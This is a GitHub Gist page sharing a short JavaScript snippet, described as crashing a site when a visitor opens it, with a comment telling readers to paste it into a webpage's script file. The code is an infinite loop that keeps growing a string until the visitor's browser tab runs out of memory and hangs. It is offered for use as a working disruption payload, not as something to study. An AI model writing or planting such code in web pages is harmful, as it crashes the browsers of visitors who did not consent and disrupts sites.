Created
December 1, 2021 12:55
-
-
Save 546pvp/c58f16524950563219b7a0a98a181a9e to your computer and use it in GitHub Desktop.
This JS script will crash site When client open it
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//paste this script into your webpage script file | |
let crash; | |
crash = "crash" | |
let i = true; | |
while (i = true) { | |
crash += "crash" | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment